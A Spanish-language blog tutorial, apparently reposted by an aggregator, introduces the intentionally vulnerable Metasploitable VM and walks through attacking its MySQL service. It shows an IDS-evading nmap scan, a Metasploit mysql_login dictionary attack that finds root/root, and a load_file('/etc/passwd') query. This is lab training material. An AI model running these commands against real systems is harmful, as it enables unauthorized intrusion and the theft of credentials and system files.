Quantcast
Viewing all articles
Browse latest Browse all 11

Entrenando con Metasploitable (I). Introducción y ataque a mysql

Hoy vamos a presentar Metasploitable, que es una distribución GNU/Linux vulnerable basada en Ubuntu 8.04 server (Hardy Heron) que poseé varias vulnerabilidades: como pueden ser credenciales de acceso poco robustas, y servicios vulnerables como distcc, tikiwiki y mysql.

Image may be NSFW.
Clik here to view.
Descargar
Descarga Metasploitable (torrent)

La distro ya viene instalada como imagen de VMware y para arrancar el servidor solo necesitamos VMware Player que es gratuito. Una vez instalado y configurada la red en modo Bridge para poder realizar la explotación desde Backtrack (o Metasploit desde Windows y Nmap).

Una vez se nos haya descargado la máquina virtual solamente tenemos que descomprimir y abrir el archivo con VMware Player. La ponemos en marcha y cuando nos pida credenciales ponemos msfadmin / msfadmin:

Image may be NSFW.
Clik here to view.
Login msfadmin en Metasploitable

Una vez logueados haremos un ifconfig para ver que ip tenemos asociada (en nuestro caso 192.168.0.2) y nos pasaremos a Backtrack para comenzar a jugar!

Image may be NSFW.
Clik here to view.
ifconfig nos dirá la IP en la que está corriendo Metasploitable

Una vez en Backtrack comenzaremos realizando un nmap para descubrir puertos abiertos y servicios vulnerables:

nmap -sS -sV -O -f -n 192.168.0.2

-sS   Análisis TCP SYN

-sV   Detección de la versión de servicios

-O   Activar detección del sistema operativo

-f   Fragmentar paquetes (para evadir firewalls o IDS)

-n   No realizar resolución DNS

El resultado de nmap es el siguiente

Image may be NSFW.
Clik here to view.
Resultado del escaneo con nmap

Podemos observar que nos indica que el servidor está ejecutando mysql 5.0.51a, pues desde Metasploit buscamos modulos relacionados con mysql:

Image may be NSFW.
Clik here to view.
Resultados Metasploit mysql

Cargamos scanner/mysql/mysql_login para realizar un ataque de diccionario contra el servicio mysql del server y con show options vemos las opciones del módulo:

Image may be NSFW.
Clik here to view.
Opciones del modulo mysql_login

Cambiaremos las opciones como vienen aquí, donde diccionario.txt es este archivo:

msf auxiliary(mysql_login) > set PASS_FILE /root/diccionario.txt
PASS_FILE => /root/diccionario.txt

setmsf auxiliary(mysql_login) > set USER_FILE /root/diccionario.txt
USER_FILE => /root/diccionario.txt

msf auxiliary(mysql_login) > set RHOSTS 192.168.0.2
RHOSTS => 192.168.0.2

msf auxiliary(mysql_login) > run

Ahora probará las distintas combinaciones de credenciales usuario / contraseña y cuando haya encontrado los credenciales nos devolverá esto:

[*] 192.168.0.2:3306 Trying username:'root' with password:'root'
[+] 192.168.0.2:3306 - SUCCESSFUL LOGIN 'root' : 'root'

Ya sabemos que las credenciales de acceso al servidor mysql son root / root. Nos conectamos y nos identificamos:
Image may be NSFW.
Clik here to view.
Login en mysql

Una vez logueados en mysql podemos obtener el archivo /etc/passwd para ver los usuarios que tenemos en el sistema.

mysql> select load_file('/etc/passwd');

y obtendremos esto:

Image may be NSFW.
Clik here to view.
Obteniendo /etc/passwd mediante load_file()

Esto es todo por hoy, en sucesivas entradas veremos cómo explotar otros servicios de Metasploitable.
Happy training!


Viewing all articles
Browse latest Browse all 11